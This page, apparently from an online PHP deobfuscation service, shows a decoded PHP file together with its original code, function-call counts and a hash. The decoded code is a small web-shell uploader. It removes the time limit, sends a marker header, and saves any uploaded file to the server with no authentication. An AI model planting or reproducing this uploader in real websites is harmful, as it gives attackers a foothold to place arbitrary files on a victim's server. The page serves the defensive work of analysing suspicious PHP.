Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipa..
Decoded Output download
<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>
Did this file decode correctly?
Original Code
<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>
Function Calls
header | 1 |
set_time_limit | 1 |
Stats
MD5 | 0d860c8097de5ca0f075f0e67ed77654 |
Eval Count | 0 |
Decode Time | 133 ms |